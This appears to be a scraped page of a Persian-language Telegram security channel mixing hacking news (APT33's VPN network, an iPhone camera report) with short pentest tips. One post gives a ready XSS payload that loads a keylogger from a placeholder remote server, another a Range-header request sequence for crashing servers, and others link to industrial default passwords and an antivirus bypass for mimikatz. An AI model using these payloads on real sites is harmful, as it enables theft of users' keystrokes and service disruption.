امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
مجموعه پسوردهای پیشفرض دستگاه های کنترل صنعتی

https://www.critifence.com/default-password-database/


#SCADA
#pentest
#network


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
Manually Detect Remote Integer Overflow:

1. Note Content-Length. EX: 612
2. Take NO < Content-Length. Ex: 610
3. Add (610+612 = 1222)
4. Request Header - 'Range: bytes= -1222' => SAME RESPONSE
5. Subtract 9223372036854775808 - 1222 = 9223372036854774586
6. Request With Header - 'Range: bytes= -1222,-9223372036854774586' => BooM :)



#web
#pentest


@sec_nerd
امنیت اطلاعات pinned «گروه امنیت اطلاعات https://t.iss.one/joinchat/Cu-7qUvIA5ULBMsmH9yVzA @sec_nerd»
This media is not supported in your browser
VIEW IN TELEGRAM
Remote XSS Keylogger:

Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>

This will log a user's input to your remote server.

keylogger.php: https://pastebin.com/hzzQqSFt

keylogger.js: https://pastebin.com/ySyG4TiN

#BugBounty
#web
#pentest
#XSS


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
فیسبوک دوربین گوشی های آیفون را بصورت مخفیانه روشن میکند!
این اتفاق از سوی برخی کاربران در توییتر گزارش و ویدیوهای اثبات آن منتشر شده است.
هنوز مشخص نیست باز شدن دوربین جلوی گوشی های آیفون یک مشکل نرم افزاری ست یا فیسبوک در حال جاسوسی از کاربران خود میباشد.



https://thehackernews.com/2019/11/facebook-ios-camera.html



#facebook
#privacy
#news



@sec_nerd
اگر سایت هدف اپلیکیشن اندروید دارد:

بعد از دانلود اپ
از Diggy برای استخراج آدرس های وب آن استفاده کنید
از Arjun برای پیدا کردن پارامترهای ارسالی به آدرس های مذکور استفاده کنید.



#android
#pentest
#web
#bugbounty



@sec_nerd
آموزش دور زدن آنتی ویروس با هدف اجرای mimikatz


https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/



#windows
#privesc
#mimikatz



@sec_nerd
شرکت trend micro طی گزارشی ادعا کرد شبکه وی پی ان هکرهای ایرانی که با کد APT33 شناخته میشوند را شناسایی کرده است.
طبق این گزارش هکرهای ایرانی شبکه VPN مخصوص به خود راه اندازی کرده و با استفاده از آن اقدام به اتصال به زیرساختهای نفوذ خود میکردند و حتی بعضی از مرورهای وب خود را نیز از این طریق انجام میدادند.
گروه مذکور با بدافزار معروف Shamoon نیز شناخته میشود که در سال ۲۰۱۲ توانست ۳۵ هزار کامپیوتر را در آرامکوی عربستان آلوده کند.
در طی سال ۲۰۱۹ حملات این گروه بیشتر به سمت Spear Phishing سوق پیدا کرد و ترند مایکرو تایید میکند که این گروه امسال یک کمپانی خصوصی امریکایی که خدمات مرتبط با امنیت ملی ارائه میدهد را هدف قرار داده است.
بر اساس یک طرح دست نویس از سوی محققان ترند مایکرو، چهار لایه از شبکه ی APT33 شناسایی شده:
لایه ی VPN: که شامل نود های VPN با هدف مخفی کردن آی پی واقعی و مکان بکار گرفته شده است.
لایه ی کنترل بات: لایه ی میانجی سرورها
لایه ی C&C: جایی که گروه بات نت های بدافزاری خود را کنترل میکند.
لایه ی پروکسی: مجموعه ای از سرورهای ابری پروکسی که سرورهای C&C خود را از زامبی ها پنهان میکنند


لایه ی اول هم از ابزارهای متن باز مانند OpenVPN بجای معادل های تجاری بهره میبرد.
⭕️ به نظر Trend Micro اشتباه بزرگ این گروه استفاده از شبکه ی وی پی ان اختصاصی بود زیرا اگر آنها از سرویس های عمومی استفاده میکردند، مانیتور کردن آنها در بین انبوهی از کاربران دیگر آسان نبود ولی آنها درخواستهای مشکوک خود را به چند آی پی محدود کردند که کشف و بررسی آنها را آسان کرد ⭕️

بررسی این شبکه ی وی پی ان همچنین باعث برملا شدن تلاش های این گروه برای شناسایی شبکه های مرتبط با زنجیره ی تامین و صنعت نفت شد.
در آخر ترند اشاره میکند که از این زیرساختها برای دسترسی به وبسایتهای مرتبط با هک، میل، ارز دیجیتال و اکسپلویت ها استفاده شده.
پیشنهاد ترند میکرو به شرکت های نفت و گاز این بوده است که لاگ سرورهای خود را برای یافتن آدرس های آی پی موجود در این گزارش (در لینک زیر قابل دسترسی است) بررسی کنند.




منبع:
https://www.zdnet.com/article/iranian-hacking-group-built-its-own-vpn-network/


🌺 اختصاصی امنیت اطلاعات 🌺

#iran
#apt33
#news



@sec_nerd
وقتی پرینت مسیر پوشه ی ادمین رو برات میفرستن!


#fun


@sec_nerd